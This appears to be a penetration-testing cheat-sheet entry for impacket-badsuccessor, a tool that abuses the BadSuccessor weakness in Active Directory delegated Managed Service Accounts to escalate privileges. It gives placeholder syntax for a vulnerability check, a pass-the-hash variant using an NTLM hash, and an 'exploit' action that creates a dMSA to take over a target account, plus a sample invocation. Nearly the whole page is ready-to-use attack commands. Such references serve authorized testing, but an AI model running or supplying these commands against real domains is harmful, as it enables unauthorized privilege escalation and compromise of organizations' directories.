Impacket badsuccessor

Exploit the BadSuccessor vulnerability to escalate privileges via delegated Managed Service Accounts (dMSA)

Tool
impacket-badsuccessor
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-badsuccessor -action check '<domain>/<user>:<password>' -dc-ip '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-badsuccessor -action check -hashes ':<hash>' '<domain>/<user>' -dc-ip '<ip>'

Exploit (create dMSA) requires password

impacket-badsuccessor -action exploit -target-account '<target_user>' '<domain>/<user>:<password>' -dc-ip '<ip>'

Examples

impacket-badsuccessor -action check 'CORP.LOCAL/user:password' -dc-ip '192.168.1.100'

Tags

impacket badsuccessor dmsa privilege-escalation acl